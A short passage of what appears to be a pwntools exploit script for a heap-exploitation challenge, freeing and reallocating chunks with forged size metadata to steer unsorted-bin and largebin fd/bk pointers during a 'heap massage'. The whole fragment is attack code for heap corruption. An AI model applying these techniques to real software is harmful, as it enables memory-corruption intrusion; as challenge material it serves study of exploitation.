free(5) # coalesce in unsorted to get leftover pointers

# 0, 1, 2, 4, 7

# with unlink, 3 and end of 5 will be getting heap pointers (but 5 will have nulls in front because of forged size metadata)
alloc(0x438, 'C' * 8) # 3, fix the fd pointer, pulling back from unsorted
alloc(0x418 + 0x20, 'D' * (0x418) + p64(0x461)) # 5, fix the bk pointer, pulling from the one I coalesced, sorts an unsorted chunk to largebin

# 0, 1, 2, 3, 4, 5, 7
log.info("finished heap massage")